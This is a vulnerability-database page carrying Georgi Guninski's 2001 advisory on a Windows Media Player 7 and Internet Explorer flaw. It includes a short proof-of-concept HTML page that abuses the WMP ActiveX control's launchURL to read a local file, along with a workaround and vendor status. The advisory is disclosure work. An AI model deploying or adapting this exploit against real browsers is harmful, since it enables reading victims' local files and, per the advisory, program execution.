Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

guninski31.txt

🗓️ 04 Jan 2001 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

High risk vulnerability in Windows Media Player 7 and IE allows arbitrary program execution.

Code
`Georgi Guninski security advisory #31, 2001  
  
Windows Media Player 7 and IE vulnerability - executing arbitrary programs  
  
Systems affected:  
Windows Media Player 7 and IE  
  
Risk: High  
Date: 1 January 2001  
  
Legal Notice:  
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmo  
dified.  
You may not modify it and distribute it or distribute parts of it without the a  
uthor's  
written permission.  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not of any c  
ompany.  
The usual standard disclaimer applies, especially the fact that Georgi Guninski  
is not liable for any damages caused by direct or indirect use of the informat  
ion  
or functionality provided by this advisory or program.  
Georgi Guninski, bears no responsibility for content or misuse of this advisory  
or program or  
any derivatives thereof.  
  
Description:  
  
There is a security vulnerability in Windows Media Player 7 exploitable thru IE  
which allows reading local files which in turn allows executing arbitratrary pr  
ograms.  
This may lead to taking full control over user's computer.  
  
Details:  
The problem is the WMP ActiveX Control which allows launching javascript URLs i  
n arbitrary  
already open frames. This allows taking over the frames's DOM. Examine the code  
for more  
info.  
  
The code is:  
--------wmp7ie.html------------------------------------------------  
<object id="o1" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6">  
<PARAM NAME="defaultFrame" value="georgi">  
</object>  
<SCRIPT>  
alert("This page reads C:\\test.txt");  
window.open("file://c:/test.txt","georgi");  
function f()  
{  
document.o1.object.launchURL("javascript:alert(document.body.innerText)");  
}  
setTimeout("f()",1000);  
</SCRIPT>  
---------------------------------------------------------------------  
  
Workaround:  
Disable Active Scripting.  
  
Demonstration is available at:  
http://www.guninski.com/wmp7ie.html  
  
Vendor status:  
Microsoft was contacted on 26 December 2000.  
  
Regards,  
Georgi Guninski  
http://www.guninski.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jan 2001 00:00Current
7.4High risk
Vulners AI Score7.4
windows media playerinternet explorersecurity vulnerabilityarbitrary program executionuser controlactivex controllocal file access.
18